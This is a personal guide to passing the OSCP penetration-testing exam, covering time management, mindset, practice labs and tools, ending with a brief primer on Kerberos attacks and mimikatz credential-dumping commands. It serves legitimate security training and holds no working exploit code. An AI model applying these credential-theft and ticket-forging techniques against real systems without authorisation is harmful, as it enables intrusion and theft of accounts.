Guide to 1-take pass
TL;DR
General Approach
- BOF > Easy > Medium x2
- Choose a time slot you are the most focused on at the start.
- Break and sugar are important.
- Time management is exceptionally critical in your exam because it is 100% you will get stuck.
- Time management is exceptionally critical in your exam because you need to prepare a valid, thoughtful, copy-and-paste working pdf report in 7z format. No marks for reports cannot fulfill the requirements.
Exam experience and Try harder
- ”Try Harder”
- No rabbit hole, just if you know what you are doing.
- Practice BOF
Mindset preparation
- Try hard to do it simply.
- Try hard to find something weird.
- Study the vulnerability.
- Don’t give up.
Practice
- Note-taking and Walkthrough writing practice
- Support the community
- Hack-The-Box, Try-Hack-Me, Proofing Ground List
- That is fine to read a walkthrough, just make sure you take something.
Tool
- AutoRecon is good stuff.
- Master BOF especially the practice in TryHackMe. Here is a good example with the OSCP level difficulty BOF and Privilege Escalation.
- Hactricks
Knowledge point in OSCP
- Tunneling
- Potato and print spoofer
- Linux Kernel Suggester
Approach
I was panic before taking the exam even I practice literally every minute I am not sleeping. Because you have no idea about the true difficulty of the exam. I just kept reading the following when I try to learn how hard it is:
Offensive Security Certified Professional is one of the hardest technical certifications requiring the candidate to take a 24hr long exam. Within 24 hours, the candidate must be able to obtain at least 70 points from the 5 machines:
Buffer Over Flow — 25 points
Easy Machine — 10 points
Medium Machine — 20 points x2
Hard Machine — 25 points
I saw many took the approach of BOF>Hard>Medium. But personally, I feel more comfortable taking the other approach:
Because if you cannot kill the easy/medium easily, how can you kill the hard one within the time limit?
Time and Risk Management
I scheduled the exam for 1500 23 Nov 2021. Because I always have a bad sleep before anything critical, so I choose a late timeslot so I can sleep a little bit in case I could not.
It turned out it was the right decision. I had bad sleep. And I could take a nap 1200~1400. If I picked 0900/1200, I can't imagine what it could be.
Following is the time consumed during the exam
1hr30min: BOF flag
30min: Easy flag
1hr: Medium#1 user flag
2hr30min: Medium#1 root flag
4hr: Medium#2 user flag
2hr30min: Medium #2 root flag
6hr: Report writing
Time used to pwn OSCP passing potins ~ 12 hours
End exam early. Total ~ 18 hours
If I took the path of BOF>hard, I am not sure if I can maintain my focus at the medium later. And it was the right decision. Because of the last medium, man I feel it is trolling me and test your “Try Harder”. I thought I might be f**ked this time when I was struggling with the PE of both Medium #2 user flag.
Not to mention, you need to complete the report.
From this guide, there is a highlight about the exam requirement:
You must get in the directory containing the flag, showing the root/admin account with the ipconfig/ifconfg
But in fact, what’s more, is that you need to provide a detailed step-by-step with explanations report with screenshot.
So, what I did in the last 6 hours was make sure my steps can be executed by copy-and-paste and providing all the screenshots.
Instead of doing the report the next day, I chose to do it with the VPN available timeslot so I can reduce the risk of missing steps/screenshots.
After all, convert the word document to pdf and then 7z + MD5 hash.
Exam Experience and Try Harder
During the practice, we students always ask for hints. And, most of the answer is “Try Harder”. This is the magic word which considered bullshit if you are the “ask for answer” guy.
However, in my exam experience, my own “TRY HARDER” is tested.
//1 Buffer Overflow
This should have been done with 30 minutes. But I was using my own skeleton code and made some careless mistakes which caused it to fail. It was pressured when it passed 1hr and I tried what I know. But TryHackMe gave me the confidence to know I was on the right track.
I tried harder to study different kinds of BOF in the extra mile + other platforms.
//2 Easy
After the heart-attack-causing BOF, I finally engage with the easy one. I can get the feeling of what OSCP wants the candidate to know from this question and enjoy the machine. There was no rabbit hole but it requires your determination to get deep enumeration.
I tried harder to enumerate mannually based on the result of the auto tool.
//3 Medium #1
Based on the deep enumeration idea you got, you will do the same deep enumeration on the medium. The initial foothold was easy. The part that made it a little bit difficult was how you do enumeration after foothold. So if you are relying on existing auto tools, this exam surely can make you(me) feel not well.
I tried harder without auto-tool in privilege escalation.
//4 Medium #2
This is another level of enumeration and testing my sense of entry point, the vulnerable software was tricky and I spent a lot of time doing the PoC myself. I also used up nearly all my revert because:
But luckily I found the entry after I blended my mind.
I tried harder to take away my perception.
In general, if you have done enough practice on your own, you can identify the “rabbit holes”. After the bloodly PoC implementation, I finally get what it really is.
BOF is also an extremely high value for your practice. Once you got how to do it, you can secure your 25 points instantly.
Mindset Preparation
The mindset is your most important tool. It decides your approach, your method, and your strategy. If you build up a reflection in your brain to ask “what is the answer” instead of asking for “how to find the answer”, you will give up easily. Hence, I focused to build a way I find comfortable to do pentest.
#1 Methodology
Before entering the penetration test, I tried hard to know “how and what is the methodology” so I can perform a systematic penetration test.
After that period, I started to find my methodology. But, it was obtained from my failed job interview.
Me: What is your methodology to conduct pentest?
Interviewer: Try simple first.
This line saved me every time when I got stuck. Somehow my brain tended to complicate the stuff caused me to overlook something.
I also build my own checklist:
But sooner or later I did those automatically before I view them, I only use it when I finished finding something weird/interesting.
#2 Find weirds
When there is software and someone wants to make it cater to the need, there must be some customization. I was focusing on finding and guessing the weird.
I got used to using auto tools first (e.g. nmap, autorecon, xxxpeas, pspy, xxx-suggester, etc). After reading many and many results, I have an idea about what the normal result looks like. They can be interesting vectors.
It is also a good practice to note down your finding and summarise them.
Following is my note-taking evolution:
I also write write-up and summaries the findings to make my brain has clues to recall when I saw something similar next time. Although the vulnerabilities are different everything time, there are similarities to trigger your imagination. From the theory of “learning”, you need to make some clues in your brain so you can recall, especially when you want to find something weird.
#3 Study the vulnerability
EDB (exploit-db) is so convenient to find the code and hit-and-run. I have a habit of keeping and reading the source of the code, usually a blog to try to understand how it works. You have no idea if the target can fulfill the requirements of your exploit or not.
I have encountered the same vulnerability of the same software with at least 2 kinds of approaches to exploit it targeting different Windows systems. But none of them can match my target. I need to do further study and make the necessary adjustment to make it works.
#4 Don’t Give up
Practice
After preparing the mindset, we go to see what practice we need to do exactly to pass the OSCP exam.
#1 Note-taking and Walkthrough writing practice
Note-taking is freaking important. Your note style is how you note during exam. Your note will directly affect your understanding of the box and the material to write your reports.
I strongly advise using note-taking tools such as cherry tree and OneNote.
Personally, I am using OneNote. It has a user-friendly UI to manage different notes from different practice platforms.
For each work area, I start a tab for each machine to manage my process and note down the take-away.
It is also worth the time to write the lab report, at least the part for the write-up of target machines to get your own comfortable template/style.
During writing the report, you will know what you need to capture during your note-taking and know if there is any missing in your note. Remember the exam report requirements:
#2 Support community
It is strongly advised to join the Discord and the OSCP forum to communicate with others to help with your tough time.
In the community, you would be the one who finds the hints and the one who gives hints.
The advantage of finding hints is obvious.
The advantage of giving hints is that you can review your report/notes to see if they are repeatable. Some may even find another interesting path you might not try like exploiting without Metasploit.
So, be nice and helpful =].
#3 HackTheBox, Try Hack Me, OSCP PG
Following is the passing rate vs box pwned:
After 41 days, I finished all the 75 labs and started founding the other labs to prepare for the exam. Following were the boxes I have done:
Before purchasing the OSCP, you can purchase the HTB VIP first to have a look at the retired machines and read the walkthrough. So that you can get a rough idea and the difficulty before purchasing the OSCP lab and the exam.
After HackTheBox, I found the idea to approach the lab. The walkthrough and video from Ippsec together did a tremendous help.
#4 Reading Walkthrough
Following is the daily life of OSCP and HTB Community:
While some encourage not to read the write-up, it is impossible and learning slow.
I started at a bad and slow learning curve while I started HTB without reading the walkthrough. The concept, the tool, the idea I got were misunderstood. It was a painful period.
But now it is more mature in the market to provide tutorials like TryHackme Learning Path and HTB Academy.
I would suggest reading the write-up but make sure you are hands-on with it and take away something. Otherwise, you’ve just ruined yourself relying on the write-up.
OSCP PG has a good mechanism of providing hints and walkthroughs.
Tools
Tools were critical to speed up my process. The following 2 tools were critical to my exam:
#1 AutoRecon
Speed up almost 85% of my work. It was automatically executing my enumeration commands. Simply start a python server to have a better view of the result.
#2 BOF template
I made myself a BOF template to process different BOF stages: Fuzzing, locating EIP, Control EIP, Bad Char identification and Exploit. Just toggle the function and update the content, follow the comments to make it works.
#3 Hacktricks
The MVP of the whole journey. I took a lot from it.
Kernel exploit and Tunneling in OSCP
Although the OSCP lab was covering most of the attacks, there are some kernel attacks, OS attacks, and Tunneling which are worth thinking of when there is no effective vector found.
#1 Tunnel
Although the material provided a module discussing tunneling, I found the article from 0xdf more comfortable when you don't want to set up ssh key/password. Somehow I learned the concept of tunneling more comfortable using this.
I can then set up ssh tunnel more smoothly.
#2 Windows Exploit Potatoes and Printer Spoofer
If the foothold user has the privilege: SeImpersonatePrivilege, it is worth trying the above when no further vector can be identified.
#3 Linux Kernel Suggester, Dirty Cow
A quick exploit checker based on the Linux kernel version. Useful in the OSCP journey.
Summary — I Tried Harder
I scheduled my OSCP exam at 1500, 23 Nov and ended it at 0800 24 Nov. Result obtained at ~23:45 25 Nov.
I tried harder to practice, 75/75 labs, HTB,TryHackMe, OSCP PG.
I tried hardre to prepare my mindset, take off my perception and hands-on enumerate the target.
I tried harder to get well prepare my tools, my notes, my walkthrough to build my strategy.
I tried harder to help the community to reinforce my skills and ideas.
I tried harder to ask myself the right question.
I tried harder to do the difficult.
I hope you can find your “Try Harder” and pass the OSCP.
Thanks nop (https://nop-blog.tech/) who helped me at the very early stage of OSCP.
Thanks Stefan for the chat.
And most important, my wife who unlimited support me during my tough time.
Thank you for your reading. Hope you find it useful.
BTW….
OSCP has just announced to change the format of the exam. Instead of BOF, they will be more focusing on the AD chain penetration. Following are the materials I read during the practice in the OSCP.
Following is the extremely high-level mind map to know how to do Kerberos:
Following is the TL;DR flow purpose of Kerberos:
KDC — >User : Identification + session
Token encrypted by krbtgt/user password(for identification and session
Use → Service: Access
Token encrypted by service password
ST can be requested by Anyone who has TGT -> Request it and brute force Service password = Kerberoast.
Knowing the service password, forge ST = Silver
Knowing the krbtgt password, forget TGT = Golden
User disable Preauthen = AS_REP Roast
Kerberoast 101 is an hour-long video but a really clear and easy-to-understand presentation to understand the basics. At least you can quickly know the idea of playing and forging the tickets.
If you understand the above, you understand the following as well:
Impacket, needs no explaining.
Another great source of reading, I went his blog quite a lot when I was encountered AD attack during practice.
BloodHound. You will want to know the shortest path to obtain the DA or account for dcsync attack in the graphic. I believe you would not want to hurt your eyes.
A tool to read LDAP. Another tool to protect your eyes.
Also, an HTB box Sauna comes to my mind:
Also, the kiwi fruit:
KERBEROS::Golden and SEKURLSA::LogonPasswords can provide great support during the post-exploitation.
Hope it helps.
